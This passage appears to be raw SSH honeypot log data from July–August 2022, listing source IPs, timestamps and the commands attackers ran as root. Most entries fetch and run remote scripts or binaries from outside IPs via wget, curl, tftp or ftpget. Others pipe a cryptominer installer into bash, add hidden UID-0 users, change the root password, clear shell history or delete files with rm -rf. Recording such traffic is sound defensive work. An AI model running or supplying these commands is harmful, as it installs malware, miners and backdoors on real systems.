-d':'|uniq -c ; uname -a cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c uname -a From 178.62.101.117 8-Jul-2022 10:04:28 ssh2 root Exec uptime uptime From 13.126.186.24 11-Jul-2022 17:53:07 ssh2 root Exec echo -n 21tc59fr|md5sum;uname -a echo -n 21tc59fr|md5sum uname -a From 81.177.126.60 12-Jul-2022 20:29:20 ssh2 root Exec cat /proc/1 cat /proc/1 From 82.165.236.132 13-Jul-2022 09:15:59 ssh2 root unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 ls From 193.105.134.95 13-Jul-2022 09:16:47 ssh2 root cd /var/www ls locate apt-get apt-get install mlocate locate www mlocate From 64.27.7.88 14-Jul-2022 17:08:39 ssh2 root ls w free -g yum apt /usr/sbin/useradd -o -u 0 -g 0 r00t -p admin1234 /usr/sbin/useradd -o -u 0 -g 0 .test -p admin1234 passwd root passwd r00t passwd .test passwd root exit From 141.98.6.76 15-Jul-2022 21:36:03 ssh2 root Exec uname -a; sudo hive-passwd set d353rh34g411g3334gji3jirg; sudo hive-passwd ij24gji33g34i4jhgji345hji5h uname -a sudo hive-passwd set d353rh34g411g3334gji3jirg sudo hive-passwd ij24gji33g34i4jhgji345hji5h From 141.98.6.76 15-Jul-2022 22:31:14 ssh2 root Exec uname -a; sudo hive-passwd set d353rh34g411g3334gji3jirg; sudo hive-passwd ij24gji33g34i4jhgji345hji5h uname -a sudo hive-passwd set d353rh34g411g3334gji3jirg sudo hive-passwd ij24gji33g34i4jhgji345hji5h From 141.98.6.76 16-Jul-2022 03:24:01 ssh2 root Exec uname -a; sudo hive-passwd set d353rh34g44gji3jirg; sudo hive-passwd ij4i33g34i4jhgji345hji5h uname -a sudo hive-passwd set d353rh34g44gji3jirg sudo hive-passwd ij4i33g34i4jhgji345hji5h From 141.98.6.76 16-Jul-2022 05:40:26 ssh2 root Exec uname -a; sudo hive-passwd set d353rh34g44gji3jirg; sudo hive-passwd ij4i33g34i4jhgji345hji5h uname -a sudo hive-passwd set d353rh34g44gji3jirg sudo hive-passwd ij4i33g34i4jhgji345hji5h From 190.90.156.90 16-Jul-2022 07:23:48 ssh2 root Exec cat /etc/os-release cat /etc/os-release From 45.14.192.10 17-Jul-2022 07:21:36 ssh2 root Exec cd /tmp ; wget 141.95.188.153/ok.sh ; sh ok.sh ; rm -rf ok.sh ; curl -O 141.95.188.153/ok.sh ; sh ok.sh ; rm -rf ok.sh ; history -c cd /tmp wget 141.95.188.153/ok.sh sh ok.sh rm -rf ok.sh curl -O 141.95.188.153/ok.sh sh ok.sh rm -rf ok.sh history -c From 141.98.6.76 18-Jul-2022 05:02:30 ssh2 root Exec uname -a; sudo hive-passwd set d353rh34g44gji34g3jirg; sudo hive-passwd ij4i33g34g34i4jhgji345hji5h uname -a sudo hive-passwd set d353rh34g44gji34g3jirg sudo hive-passwd ij4i33g34g34i4jhgji345hji5h From 141.98.6.76 18-Jul-2022 14:30:45 ssh2 root Exec uname -a; sudo hive-passwd set d353rh34g44gji34g3jirg; sudo hive-passwd ij4i33g34g34i4jhgji345hji5h uname -a sudo hive-passwd set d353rh34g44gji34g3jirg sudo hive-passwd ij4i33g34g34i4jhgji345hji5h From 141.98.6.76 18-Jul-2022 20:18:45 ssh2 root Exec uname -a; sudo hive-passwd set d353rh34g44gji34g334gjirg; sudo hive-passwd ij4i33g33g344g34i4jhgji345hji5h uname -a sudo hive-passwd set d353rh34g44gji34g334gjirg sudo hive-passwd ij4i33g33g344g34i4jhgji345hji5h From 163.30.32.11 19-Jul-2022 01:28:26 ssh2 root Exec echo -n ub5g98o0|md5sum;uname -a echo -n ub5g98o0|md5sum uname -a From 141.98.6.76 19-Jul-2022 06:42:43 ssh2 root Exec uname -a; sudo hive-passwd set d353rh34g44gji34g334ggjirg; sudo hive-passwd gi33g344g34i4jhgji345hji5h uname -a sudo hive-passwd set d353rh34g44gji34g334ggjirg sudo hive-passwd gi33g344g34i4jhgji345hji5h From 222.186.42.99 20-Jul-2022 05:28:28 ssh2 root Exec uname -s -m uname -s -m From 58.229.13.59 20-Jul-2022 12:03:12 ssh2 root Exec uname -a;nproc;history -c uname -a nproc history -c From 81.161.229.98 20-Jul-2022 19:57:51 ssh2 root Exec uname -a; sudo hive-passwd set i3j24ghij34hgij34jihi1j546t; sudo hive-passwd 3ji14ghij34hji34h5ij34ij5h uname -a sudo hive-passwd set i3j24ghij34hgij34jihi1j546t sudo hive-passwd 3ji14ghij34hji34h5ij34ij5h From 121.201.73.78 21-Jul-2022 02:01:11 ssh2 root Exec uname -a; cd /tmp ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN uname -a cd /tmp curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN Exec uname -a; cd /tmp ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN uname -a cd /tmp curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN From 121.201.73.78 21-Jul-2022 02:01:19 ssh2 root Exec uname -a; cd /tmp ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN uname -a cd /tmp curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN From 81.161.229.98 21-Jul-2022 17:39:08 ssh2 root Exec uname -a; sudo hive-passwd set i3j24ghi23gi1j546t; sudo hive-passwd 3ji14324g34h5ij34ij5h uname -a sudo hive-passwd set i3j24ghi23gi1j546t sudo hive-passwd 3ji14324g34h5ij34ij5h From 159.203.96.251 22-Jul-2022 09:27:27 ssh2 root Exec nproc ; uname -a nproc uname -a From 205.185.118.213 22-Jul-2022 13:25:00 ssh2 root Exec cat /etc/passwd cat /etc/passwd From 205.185.118.213 22-Jul-2022 13:25:01 ssh2 root Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.118.213/krn.tar || curl -o krn.tar http://205.185.118.213/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456 cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://205.185.118.213/krn.tar || curl -o krn.tar http://205.185.118.213/krn.tar tar -xf krn.tar cd krn chmod +x * ./sshd ./krane 123456 From 208.67.106.145 23-Jul-2022 13:16:05 ssh2 root Exec wget 208.67.106.115/bins/x86; chmod 777 x86; ./x86 wns.x86 wget 208.67.106.115/bins/x86 chmod 777 x86 ./x86 wns.x86 From 208.67.106.145 23-Jul-2022 22:57:25 ssh2 root Exec wget 208.67.106.115/bins/x86; chmod 777 x86; ./x86 wns.x86 wget 208.67.106.115/bins/x86 chmod 777 x86 ./x86 wns.x86 From 81.161.229.98 25-Jul-2022 14:31:48 ssh2 root Exec uname -a; sudo hive-passwd set i3j24ghi23g23gi1j546t; sudo hive-passwd 3ji14324g332g4h5ij34ij5h uname -a sudo hive-passwd set i3j24ghi23g23gi1j546t sudo hive-passwd 3ji14324g332g4h5ij34ij5h From 81.161.229.98 25-Jul-2022 19:37:28 ssh2 root Exec uname -a; sudo hive-passwd set i3j24ghi23g23gi1j546t; sudo hive-passwd 3ji14324g332g4h5ij34ij5h uname -a sudo hive-passwd set i3j24ghi23g23gi1j546t sudo hive-passwd 3ji14324g332g4h5ij34ij5h From 81.161.229.98 26-Jul-2022 08:04:03 ssh2 root Exec uname -a; sudo hive-passwd set i3j24gh34g546t; sudo hive-passwd 3ji14334g2g4h5ij34ij5h uname -a sudo hive-passwd set i3j24gh34g546t sudo hive-passwd 3ji14334g2g4h5ij34ij5h From 81.161.229.98 27-Jul-2022 05:15:57 ssh2 root Exec uname -a; sudo hive-passwd set i3j24gh34g3232gg546t; sudo hive-passwd 3ji23g4h5ij34ij5h uname -a sudo hive-passwd set i3j24gh34g3232gg546t sudo hive-passwd 3ji23g4h5ij34ij5h From 54.37.80.220 27-Jul-2022 21:22:36 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.145.167.32/catvsdog.sh; curl -O http://45.145.167.32/catvsdog.sh; chmod 777 catvsdog.sh; sh catvsdog.sh; tftp 45.145.167.32 -c get 0xt984767.sh; chmod 777 catvsdog.sh; sh catvsdog.sh; tftp -r catvsdog.sh -g 45.145.167.32; chmod 777 catvsdog.sh; sh catvsdog.sh; ftpget -v -u anonymous -p anonymous -P 21 45.145.167.32 catvsdog.sh catvsdog.sh; sh catvsdog.sh; rm -rf 0xt984767.sh catvsdog.sh catvsdog.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://45.145.167.32/catvsdog.sh curl -O http://45.145.167.32/catvsdog.sh chmod 777 catvsdog.sh sh catvsdog.sh tftp 45.145.167.32 -c get 0xt984767.sh chmod 777 catvsdog.sh sh catvsdog.sh tftp -r catvsdog.sh -g 45.145.167.32 chmod 777 catvsdog.sh sh catvsdog.sh ftpget -v -u anonymous -p anonymous -P 21 45.145.167.32 catvsdog.sh catvsdog.sh sh catvsdog.sh rm -rf 0xt984767.sh catvsdog.sh catvsdog.sh rm -rf * From 45.95.55.41 28-Jul-2022 13:45:13 ssh2 root Exec cd /tmp; rm -rf 86; wget http://107.189.8.111/x86_64; curl -O http://107.189.8.111/x86_64; chmod 777 x86_64; ./x86_64 x86; rm -rf * cd /tmp rm -rf 86 wget http://107.189.8.111/x86_64 curl -O http://107.189.8.111/x86_64 chmod 777 x86_64 ./x86_64 x86 rm -rf * From 205.185.118.213 28-Jul-2022 20:24:18 ssh2 root Exec cat /etc/passwd cat /etc/passwd From 205.185.118.213 28-Jul-2022 20:24:21 ssh2 root Exec cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.118.213/krn.tar || curl -o krn.tar http://205.185.118.213/krn.tar; tar -xf krn.tar; cd krn; chmod +x *; ./sshd; ./krane 123456 cd /var/tmp || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://205.185.118.213/krn.tar || curl -o krn.tar http://205.185.118.213/krn.tar tar -xf krn.tar cd krn chmod +x * ./sshd ./krane 123456 From 45.95.55.48 30-Jul-2022 20:24:30 ssh2 root Exec cd /tmp; rm -rf 86; wget http://204.76.203.168/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86; curl -O http://204.76.203.168/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86; chmod 777 infn.x86; ./infn.x86 x86; rm -rf * cd /tmp rm -rf 86 wget http://204.76.203.168/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86 curl -O http://204.76.203.168/5311qjmikurawepedalnqmashrabotatuk61119123c/infn.x86 chmod 777 infn.x86 ./infn.x86 x86 rm -rf * From 91.80.138.240 3-Aug-2022 18:05:52 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 91.80.138.240 3-Aug-2022 18:08:59 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 91.80.138.240 3-Aug-2022 18:12:36 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 159.89.44.77 5-Aug-2022 05:54:21 ssh2 root Exec nproc ; uname -a nproc uname -a From 82.165.236.132 5-Aug-2022 09:19:58 ssh2 root unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 export HISTFILESIZE=0 useradd home -ou 0 -g 0 ls From 82.165.236.132 5-Aug-2022 10:26:01 ssh2 root w clear history -c ls ps ax whereis sendmail From 104.236.174.101 6-Aug-2022 06:42:00 ssh2 root Exec pwd pwd From 82.165.236.132 6-Aug-2022 12:55:00 ssh2 root apt-get install postfix /etc/init.d/postfix restart yum install postfix apt-get update From 188.166.45.125 6-Aug-2022 16:24:33 ssh2 root Exec uname -a;nproc;lspci | grep -i --color 'VGA\|3d\|2d' uname -a nproc lspci | grep -i --color 'VGA\|3d\|2d' From 195.3.147.55 7-Aug-2022 09:26:40 ssh2 root ifconfig cat /etc/hosts apt-get update apt-get upgrade apt-get sudo apt-get update sudo apt update apt update From 208.67.106.95 8-Aug-2022 01:34:03 ssh2 root Exec yum install wget -y; apt install wget -y; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.104.67/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 208.67.104.67 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c yum install wget -y apt install wget -y cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://208.67.104.67/Fourloko.sh chmod 777 * sh Fourloko.sh tftp -g 208.67.104.67 -r tftp1.sh chmod 777 * sh tftp1.sh rm -rf *.sh history -c From 208.67.106.95 8-Aug-2022 02:15:56 ssh2 root Exec yum install wget -y; apt install wget -y; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.104.67/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 208.67.104.67 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c yum install wget -y apt install wget -y cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://208.67.104.67/Fourloko.sh chmod 777 * sh Fourloko.sh tftp -g 208.67.104.67 -r tftp1.sh chmod 777 * sh tftp1.sh rm -rf *.sh history -c From 34.105.136.202 10-Aug-2022 00:06:07 ssh2 root Exec cd /tmp; rm -rf *; wget http://109.206.241.211/mrrow.sh; curl -O http://109.206.241.211/mrrow.sh; chmod 777 mrrow.sh; sh mrrow.sh cd /tmp rm -rf * wget http://109.206.241.211/mrrow.sh curl -O http://109.206.241.211/mrrow.sh chmod 777 mrrow.sh sh mrrow.sh From 34.73.55.61 10-Aug-2022 01:46:58 ssh2 root Exec cd /tmp; rm -rf *; wget http://109.206.241.211/mrrow.sh; curl -O http://109.206.241.211/mrrow.sh; chmod 777 mrrow.sh; sh mrrow.sh cd /tmp rm -rf * wget http://109.206.241.211/mrrow.sh curl -O http://109.206.241.211/mrrow.sh chmod 777 mrrow.sh sh mrrow.sh From 195.178.120.113 10-Aug-2022 07:15:54 ssh2 root Exec wget 208.67.106.145/bns/qlcxvisgod.x86; chmod 777 qlcxvisgod.x86; ./qlcxvisgod.x86 wns.x86 wget 208.67.106.145/bns/qlcxvisgod.x86 chmod 777 qlcxvisgod.x86 ./qlcxvisgod.x86 wns.x86 From 194.36.191.93 10-Aug-2022 22:40:01 ssh2 root Exec wget wget From 39.115.13.221 11-Aug-2022 08:31:17 ssh2 root Exec (uname -smr || /bin/uname -smr || /usr/bin/uname -smr) (uname -smr || /bin/uname -smr || /usr/bin/uname -smr) From 34.69.171.232 12-Aug-2022 00:24:16 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.115.101/bins.sh; chmod +x bins.sh; sh bins.sh; tftp 205.185.115.101 -c get tftp1.sh; chmod +x tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 205.185.115.101; chmod +x tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.115.101 ftp1.sh ftp1.sh; sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://205.185.115.101/bins.sh chmod +x bins.sh sh bins.sh tftp 205.185.115.101 -c get tftp1.sh chmod +x tftp1.sh sh tftp1.sh tftp -r tftp2.sh -g 205.185.115.101 chmod +x tftp2.sh sh tftp2.sh ftpget -v -u anonymous -p anonymous -P 21 205.185.115.101 ftp1.sh ftp1.sh sh ftp1.sh tftp1.sh tftp2.sh ftp1.sh From 159.203.66.114 12-Aug-2022 08:59:05 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.104.94/SBIDIOT/x86 -O /tmp/; chmod +x /tmp/; /tmp/x86 cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://208.67.104.94/SBIDIOT/x86 -O /tmp/ chmod +x /tmp/ /tmp/x86 From 118.27.6.132 13-Aug-2022 12:04:50 ssh2 root Exec uname -a;nproc;history -c uname -a nproc history -c From 141.98.11.92 13-Aug-2022 15:43:41 ssh2 root Exec rm -rf *; cd /tmp; rm -rf *; pkill xmrig; echo -e "xoxox0\nxoxox0" | passwd; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj rm -rf * cd /tmp rm -rf * pkill xmrig echo -e "xoxox0\nxoxox0" | passwd curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj From 141.98.11.92 14-Aug-2022 01:37:45 ssh2 root Exec rm -rf *; cd /tmp; rm -rf *; pkill xmrig; echo -e "xoxox0\nxoxox0" | passwd; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj rm -rf * cd /tmp rm -rf * pkill xmrig echo -e "xoxox0\nxoxox0" | passwd curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj From 208.67.104.67 14-Aug-2022 08:45:45 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.206.241.219/phantom.sh; curl -O http://109.206.241.219/phantom.sh; chmod 777 phantom.sh; sh phantom.sh; tftp 109.206.241.219 -c get phantom.sh; chmod 777 phantom.sh; sh phantom.sh; tftp -r phantom2.sh -g 109.206.241.219; chmod 777 phantom2.sh; sh phantom2.sh; ftpget -v -u anonymous -p anonymous -P 21 109.206.241.219 phantom1.sh phantom1.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh phantom2.sh phantom1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://109.206.241.219/phantom.sh curl -O http://109.206.241.219/phantom.sh chmod 777 phantom.sh sh phantom.sh tftp 109.206.241.219 -c get phantom.sh chmod 777 phantom.sh sh phantom.sh tftp -r phantom2.sh -g 109.206.241.219 chmod 777 phantom2.sh sh phantom2.sh ftpget -v -u anonymous -p anonymous -P 21 109.206.241.219 phantom1.sh phantom1.sh sh phantom1.sh rm -rf phantom.sh phantom.sh phantom2.sh phantom1.sh rm -rf * From 45.80.30.17 15-Aug-2022 08:42:24 ssh2 root Exec cat /proc/uptime cat /proc/uptime From 156.210.14.65 16-Aug-2022 04:29:17 ssh2 root Exec cat /proc/1 cat /proc/1 From 141.98.11.92 17-Aug-2022 01:04:57 ssh2 root Exec rm -rf *; cd /tmp; rm -rf *; pkill xmrig; echo -e "xoxox1\nxoxox1" | passwd; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj rm -rf * cd /tmp rm -rf * pkill xmrig echo -e "xoxox1\nxoxox1" | passwd curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj From 141.98.11.92 17-Aug-2022 08:21:17 ssh2 root Exec rm -rf *; cd /tmp; rm -rf *; pkill xmrig; echo -e "xoxox1\nxoxox1" | passwd; curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj rm -rf * cd /tmp rm -rf * pkill xmrig echo -e "xoxox1\nxoxox1" | passwd curl -s -L https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/setup_c3pool_miner.sh | bash -s 4ANkemPGmjeLPgLfyYupu2B8Hed2dy8i6XYF7ehqRsSfbvZM2Pz7bDeaZXVQAs533a7MUnhB6pUREVDj2LgWj1AQSGo2HRj From 212.193.0.157 17-Aug-2022 19:11:35 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://107.182.129.239/sensi.sh; curl -O http://107.182.129.239/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 107.182.129.239 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 107.182.129.239; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 107.182.129.239 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf * cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://107.182.129.239/sensi.sh curl -O http://107.182.129.239/sensi.sh chmod 777 sensi.sh sh sensi.sh tftp 107.182.129.239 -c get sensi.sh chmod 777 sensi.sh sh sensi.sh tftp -r sensi2.sh -g 107.182.129.239 chmod 777 sensi2.sh sh sensi2.sh ftpget -v -u anonymous -p anonymous -P 21 107.182.129.239 sensi1.sh sensi1.sh sh sensi1.sh rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh rm -rf * From 212.193.0.157 18-Aug-2022 07:37:25 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.206.241.62/Fourloko.sh; chmod 777 *; sh Fourloko.sh; tftp -g 109.206.241.62 -r tftp1.sh; chmod 777 *; sh tftp1.sh; rm -rf *.sh; history -c cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://109.206.241.62/Fourloko.sh chmod 777 * sh Fourloko.sh tftp -g 109.206.241.62 -r tftp1.sh chmod 777 * sh tftp1.sh rm -rf *.sh history -c From 5.252.22.38 19-Aug-2022 15:03:56 ssh2 root Exec df -h df -h From 35.230.149.56 20-Aug-2022 11:25:32 ssh2 root Exec cd /tmp; rm -rf wget.sh; wget http://109.206.241.211/wget.sh; curl -O http://109.206.241.211/wget.sh; chmod 777 wget.sh; ./wget.sh cd /tmp rm -rf wget.sh wget http://109.206.241.211/wget.sh curl -O http://109.206.241.211/wget.sh chmod 777 wget.sh ./wget.sh From 34.159.167.205 21-Aug-2022 03:31:29 ssh2 root Exec cd /tmp; rm -rf wget.sh; wget http://109.206.241.211/wget.sh; curl -O http://109.206.241.211/wget.sh; chmod 777 wget.sh; ./wget.sh cd /tmp rm -rf wget.sh wget http://109.206.241.211/wget.sh curl -O http://109.206.241.211/wget.sh chmod 777 wget.sh ./wget.sh From 95.214.24.192 21-Aug-2022 07:05:13 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://109.206.241.200/arcbins.sh; chmod 777 arcbins.sh; sh arcbins.sh; tftp 109.206.241.200 -c get arctftp1.sh; chmod 777 arctftp1.sh; sh arctftp1.sh; tftp -r arctftp2.sh -g 109.206.241.200; chmod 777 arctftp2.sh; sh arctftp2.sh; rm -rf arcbins.sh arctftp1.sh arctftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://109.206.241.200/arcbins.sh chmod 777 arcbins.sh sh arcbins.sh tftp 109.206.241.200 -c get arctftp1.sh chmod 777 arctftp1.sh sh arctftp1.sh tftp -r arctftp2.sh -g 109.206.241.200 chmod 777 arctftp2.sh sh arctftp2.sh rm -rf arcbins.sh arctftp1.sh arctftp2.sh rm -rf * From 211.119.38.159 22-Aug-2022 02:54:48 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';(cd /tmp/ && curl -O http://103.104.119.144/why);bash /tmp/why uname -a lspci | grep -i --color 'vga\|3d\|2d' (cd /tmp/ curl -O http://103.104.119.144/why) bash /tmp/why From 95.214.24.192 22-Aug-2022 04:59:38 ssh2 root Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://109.206.241.219/bins/phantom.x86; curl -O http://109.206.241.219/bins/phantom.x86;cat phantom.x86 >robben;chmod +x *;./robben Payload cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget http://109.206.241.219/bins/phantom.x86 curl -O http://109.206.241.219/bins/phantom.x86 cat phantom.x86 >robben chmod +x * ./robben Payload From 95.214.24.192 22-Aug-2022 22:43:19 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://109.206.241.200/apibins.sh; chmod 777 apibins.sh; sh apibins.sh; tftp 109.206.241.200 -c get apitftp1.sh; chmod 777 apitftp1.sh; sh apitftp1.sh; tftp -r apitftp2.sh -g 109.206.241.200; chmod 777 apitftp2.sh; sh apitftp2.sh; rm -rf apibins.sh apitftp1.sh apitftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://109.206.241.200/apibins.sh chmod 777 apibins.sh sh apibins.sh tftp 109.206.241.200 -c get apitftp1.sh chmod 777 apitftp1.sh sh apitftp1.sh tftp -r apitftp2.sh -g 109.206.241.200 chmod 777 apitftp2.sh sh apitftp2.sh rm -rf apibins.sh apitftp1.sh apitftp2.sh rm -rf * From 45.232.176.4 24-Aug-2022 09:21:08 ssh2 root Exec cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c; nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c cat /proc/cpuinfo | grep name | cut -f2 -d: | uniq -c nvidia-smi --list-gpus | grep 0 | cut -f2 -d: | uniq -c From 95.214.24.192 25-Aug-2022 07:48:21 ssh2 root Exec cd /tmp || cd /run || cd /; wget http://109.206.241.200/apibins.sh; chmod 777 apibins.sh; sh apibins.sh; tftp 109.206.241.200 -c get apitftp1.sh; chmod 777 apitftp1.sh; sh apitftp1.sh; tftp -r apitftp2.sh -g 109.206.241.200; chmod 777 apitftp2.sh; sh apitftp2.sh; rm -rf apibins.sh apitftp1.sh apitftp2.sh; rm -rf * cd /tmp || cd /run || cd / wget http://109.206.241.200/apibins.sh chmod 777 apibins.sh sh apibins.sh tftp 109.206.241.200 -c get apitftp1.sh chmod 777 apitftp1.sh sh apitftp1.sh tftp -r apitftp2.sh -g 109.206.241.200 chmod 777 apitftp2.sh sh apitftp2.sh rm -rf apibins.sh apitftp1.sh apitftp2.sh rm -rf * From 107.182.129.203 